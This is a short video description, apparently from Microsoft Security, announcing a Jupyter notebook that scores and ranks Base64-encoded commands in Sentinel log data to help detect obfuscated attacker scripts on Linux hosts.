MSTIC has observed an increasing number of Linux attackers encoding their scripts into Base64 both for ease of use and to avoid detection. Because the commands are encoded, it can be time-intensive and inefficient to hone in on malicious Base64-encoded commands by looking at raw log data. To solve this problem, we have created a Jupyter notebook that makes this process easier by scoring and ranking Base64 commands found in your Sentinel data. We walk through the notebook and how to use it in this video.
Learn more https://techcommunity.microsoft.com/t....
#MicrosoftSecurity
Смотрите видео Detect Malicious Base64-Encoded Commands on Linux Hosts онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь Microsoft Security 27 Август 2021, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 1,221 раз и оно понравилось 15 людям.